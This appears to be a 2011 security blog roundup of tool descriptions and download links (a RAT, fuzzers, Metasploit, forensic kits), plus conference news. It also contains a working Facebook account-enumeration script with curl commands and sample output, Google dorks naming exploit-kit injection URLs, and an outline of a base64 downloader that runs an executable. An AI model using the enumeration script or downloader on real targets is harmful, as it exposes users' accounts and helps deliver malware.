Schwarze Sonne RAT (Remote Administration Tool) is software design to control in the best condition and confort possible any kind of Microsoft Windows up windows7

Download
https://code.google.com/p/schwarzesonenrat/downloads/list

YARA is a tool aimed at helping malware researchers to identify and classify malware samples. With YARA you can create descriptions of malware families based on textual or binary patterns contained on samples of those families. Each description consists of a set of strings and a Boolean expression which determines its logic. Let's see an example:

Download
http://code.google.com/p/yara-project/downloads/list

Moshi Moshi is a VoIP Bot written in Python that uses SIP as VoIP Protocol, Text-to-speech engines for Output, and DTMF Tones for Input. It is part of a talk ("Sounds Like Botnet") given at DEF CON 19 and BSidesLV 2011 on VoIP Botnets by Itzik Kotler and Iftach (Ian) Amit.

Download
http://code.google.com/p/moshimoshi/downloads/detail?name=moshimoshi_poc.tar.gz&can=2&q=

An international team of forensics experts, led by SANS Faculty Fellow Rob Lee, created the SANS Investigative Forensic Toolkit (SIFT) Workstation and made it available to the whole community as a public service. The free SIFT toolkit, that can match any modern forensic tool suite, is also featured in SANS' Advanced Computer Forensic Analysis and Incident Response course (FOR 508). It demonstrates that advanced investigations and responding to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.

The SIFT Workstation is a VMware appliance, pre-configured with the necessary tools to perform detailed digital forensic examination in a variety of settings. It is compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The brand new version has been completely rebuilt on an Ubuntu base with many new capabilities and tools such as log2timeline that provides a timeline that can be of enormous value to investigators.

Download
http://computer-forensics.sans.org/community/downloads

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.


Download
http://code.google.com/p/wfuzz/downloads/list

This paper aims to give an overall up-to-update review, evaluation and analysis of the underground scene of black hat hackers and/or cyber criminals.

Source PDF
http://www.exploit-db.com/download_pdf/17334/

The winners of the Pwnie Awards were announced at a ceremony in Las Vegas on Aug 3rd, 2011.

Source
http://pwnies.com/winners/

A tool to help developers and security professionals conduct manual security code reviews in a consistent and repeatable way. Agnitio aims to replace the adhoc nature of manual security code review documentation, create an audit trail and reporting.

Download
http://sourceforge.net/projects/agnitiotool/files/

Microsoft today launched a $250,000 contest for researchers who develop defensive security technologies that deal with entire classes of exploits. The total cash awards for Microsoft's "BlueHat Prize" contest easily dwarfs any bug bounty that's been given by rivals. The company announced the contest as this year's Black Hat security conference got under way today in Las Vegas.

More Details here
https://www.microsoft.com/security/bluehatprize/

see rules and regulations
https://www.microsoft.com/security/bluehatprize/rules.aspx

Features : Encoder , Processes , FTP-Brute-Forcer , Server-Information , SQL-Manager and etc.
Download
http://www.megaupload.com/?d=DRHS3AV9

The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Download
http://www.secmaniac.com/download/

The Social-Engineer Toolkit v3.0 Codename "#WeThrowBaseballs" from David Kennedy on Vimeo.

JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields. JD-GUI is free for non-commercial use. This means that JD-GUI shall not be included or embedded into commercial software products. Nevertheless, this project may be freely used for personal needs in a commercial or non-commercial environments.

Download
http://java.decompiler.free.fr/jd-gui/downloads/jd-gui-0.3.3.windows.zip
http://java.decompiler.free.fr/jd-gui/downloads/jd-gui-0.3.3.linux.i686.tar.gz

CAT provides the ability to test a web application for all types of vulnerabilities from SQL injection to reverse proxy bypass. It allows for traffic between a web browser and a web server to be intercepted and altered. Requests can then be repeated within CAT allowing for all aspects of the request to be altered. Requests can be fuzzed using a range of different fuzzing algorithms including brute forcing, injection attacks and scripted attacks; it also provides a facility to fuzz forms with CSRF tokens. Authorisation within an application can easily be checked using two synchronised web sessions from one user type to another

Download
http://www.contextis.com/resources/tools/cat/download/

Download PDF
http://www.eset.com/us/resources/white-papers/Hodprot-Report.pdf

Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. Useful programs for use in exploring malicious pages:

* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/

nSpaces: Multiple virtual Desktops With Password Protection and easy switch
Fetures of nSpaces

Launch Desktops: Create multiple desktops on your computer.
Launch Apps: Open different applications on each separate virtual desktops to improve your productivity.
Name your space: label your tag for each virtual desktop, the tag is shown on the space switcher.
Change wallpaper: Your desktop is unique, Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.
Color your space: If you don’t like to set a custom image for each desktop, just set a background color for them.
Protect your space: If you don’t like anonymous users to use your spaces, just set a password for them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you created, hotkey for the space switcher.You can change whatever you want.
Using Nspace is very easy and simple GUI based menu driven. Fast to configure and make changes and save.

Download
http://www.bytesignals.com/binary/nspaces/setup.exe

Fetures of websitedefender

Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security

Click here to register or know more on WebsiteDefender.
https://dashboard.websitedefender.com/register-for-free-website-scan.php

These are the current features of Hexinject:

Hexadecimal and raw data injection on the net
Sniff data in hexadecimal or raw format from the net
Data can be piped and easily manipulated
Raw network access cmdline framework
Automatically set the correct checksum (IP, TCP, UDP, ICMP)
Automatically set the correct packet length (IP, TCP, UDP, ICMP)

Download
http://sourceforge.net/projects/hexinject/files/

The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.

Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/

A Trojan spying on your conversations

Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx

C++ decompilation how to handle it in IDA and Hex-Rays decompiler. You can get the slides here
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
and download the recorded talk here.
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation

New injection url is 1see[dot]ir/j/. Currently leading to a Best Pack exploit kit

Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/

Step by step:

- - Go to http://m.facebook.com

- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.

Using cURL:

curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done

#+----- EOF ------+


You can ennumerate users by using a list of email address or phone numbers.

$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO

by
Zerial

Source
http://pastebin.com/GYNVsR1W

by
The Snake

A Comparison of 60 Commercial & Open Source Black Box Web Application Vulnerability Scanners.

By Shay Chen
Security Consultant, Researcher & Instructor
http://sectooladdict.blogspot.com/
sectooladdict-$at$-gmail-$dot$-com
August 2011
Assessment Environments: WAVSEP 1.0 / WAVSEP 1.0.3 (http://code.google.com/p/wavsep/)

As per Google search results, looks like 160,000 site have been compromised recently (Spyeye & Black hole Exploit kit)

Dork:
exero.eu/catalog/jquery.js

Web security testing tool and passive vulnerability scanner

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Download
http://websecuritytool.codeplex.com/releases/view/22212

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

Download
http://code.google.com/p/hexorbase/downloads/list

"It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's fexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions."

Download

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-mini.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-full.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-mini.run

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run

http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2

Metasploit 4.0 And Armitage - What's New?

Source
http://pastebin.com/MFc4SY3S

download complete everything @
http://www.megaupload.com/?d=QKMY6HRW
UPDATE: GITHUB REPO AVAILABLE NOW! https://github.com/opendeveloper/anonware (^)_(^)

LAS VEGAS — The 2011 Black Hat security conference is promising a smorgasbord of (in)security fun. From vulnerabilities in PLCs (programmable logic controllers) to the security design of Apple’s iOS and potential hacker attacks on medical implant devices, the range of presentations this year could be the best ever.

Here’s a list of this year’s can’t-miss presentations:
http://www.zdnet.com/blog/security/black-hat-10-cant-miss-hacks-and-presentations/9132

Convert the EXE file to Base64 and upload it to a website. the downloader download it and save it as a text file. The downloader will then convert the Base64 text to binary, save it as an executable, and then execute it.



Download base64:
http://download.cnet.com/Base64-De-Encoder/3000-2247_4-10571789.html

Downoad PDF
http://www.vulnerability-lab.com/resources/documents/198.pdf